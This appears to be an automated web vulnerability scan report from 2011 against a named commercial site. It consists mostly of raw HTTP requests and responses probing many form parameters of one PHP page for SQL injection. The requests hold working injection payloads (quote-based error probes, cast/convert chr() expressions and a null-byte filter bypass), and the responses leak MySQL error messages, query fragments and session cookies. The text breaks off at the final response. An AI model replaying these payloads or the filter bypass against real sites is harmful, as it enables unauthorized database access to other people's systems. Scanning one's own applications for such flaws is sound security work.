GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=48kq3cmmdftafkg4tlde56uua7; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=aqhcsavcs1m3nfqfa87k0nki82; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v24m8mj0nhesi7hj4l472ji0f6; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=17j74sq0n1vo09c6q517ps1853; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance%00'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7374 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 8)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance%00''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9u5sg3prljhhgnclt8j2fc1b60; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=34lc4o834qn3fs4oqk8mq6qmg5; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=21e4tvunsri5negc28u72fiqd4; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ji0bomvkstq1stneatr8d2svm2; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_423%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_423%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon'&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ofsd6jsjuch07pbdi0kpb1mec2; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' print, and send&attributeId_425=2765__Yes - We already have a list of addresses' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon''&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:52:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=i8sbpvp9ff1jaqnlh0bo0f7ua7; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The attributeId_424 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_424 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send'&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=eesj23r7dkrhfh1aegkrgo1mq2; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'already have a list of addresses&attributeId_426=2768__500 - 4,999&attributeId_4' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send''&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
